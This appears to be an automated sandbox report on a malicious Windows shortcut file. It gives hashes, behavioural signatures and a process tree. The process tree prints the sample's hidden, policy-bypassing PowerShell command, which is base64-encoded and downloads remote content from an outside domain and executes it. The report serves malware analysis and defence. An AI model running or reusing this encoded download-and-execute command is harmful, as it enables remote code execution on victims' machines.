Analysis
-
max time kernel
121s -
max time network
121s -
platform
windows7_x64 -
resource
win7-20240221-en -
resource tags
arch:x64arch:x86image:win7-20240221-enlocale:en-usos:windows7-x64system -
submitted
05-04-2024 08:43
Static task
static1
Behavioral task
behavioral1
Sample
DOC527 - 527527.lnk
Resource
win7-20240221-en
4 signatures
150 seconds
Behavioral task
behavioral2
Sample
DOC527 - 527527.lnk
Resource
win10v2004-20240226-en
8 signatures
150 seconds
General
-
Target
DOC527 - 527527.lnk
-
Size
9KB
-
MD5
8f67aaa7b8bf4df78de954a16bcf67ca
-
SHA1
2cedea1467518ab950820767b6f546344d228305
-
SHA256
b8a5cb1a0bc2ddd5b12f29781391ce38806b8dd0af28a0612d71a58063250ae8
-
SHA512
09519377b6dbedb528e4c96342b4c28ad71e2a286bb61866daea52d8a657969e4d53685cc14e122e8f3eb24e9ca5e0da6d77b2786d502b1b9a056c7154e83934
-
SSDEEP
192:8z55hm3MSBf6OY1tvnT1wEuz4+nCWLFf3m/9h0yAE7oxMdPDTJvs3DoTNxHJ6:u5vcMS5otvnT1w7p9WIBE7UkpoyHJ6
Score
3/10
Malware Config
Signatures
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Suspicious behavior: EnumeratesProcesses 1 IoCs
Processes:
powershell.exepid process 2632 powershell.exe -
Suspicious use of AdjustPrivilegeToken 1 IoCs
Processes:
powershell.exedescription pid process Token: SeDebugPrivilege 2632 powershell.exe -
Suspicious use of WriteProcessMemory 3 IoCs
Processes:
cmd.exedescription pid process target process PID 2992 wrote to memory of 2632 2992 cmd.exe powershell.exe PID 2992 wrote to memory of 2632 2992 cmd.exe powershell.exe PID 2992 wrote to memory of 2632 2992 cmd.exe powershell.exe
Processes
-
C:\Windows\system32\cmd.execmd /c "C:\Users\Admin\AppData\Local\Temp\DOC527 - 527527.lnk"1⤵
- Suspicious use of WriteProcessMemory
PID:2992 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoP -Ex Bypass -WindowStyle Hidden -Enc KABpAHcAcgAgAGgAdAB0AHAAcwA6AC8ALwBpAG0AYQBuAGkAawB1AHUALgBjAG8AbQAvAGQAbwBuAGUALgB0AHgAdAAgAC0AVQBzAGUAQgBhAHMAaQBjAFAAYQByAHMAaQBuAGcAKQAuAEMAbwBuAHQAZQBuAHQAIAB8ACAAaQBOAHYATwBrAEUALQBFAHgAUAByAGUAUwBzAGkATwBuAA==2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2632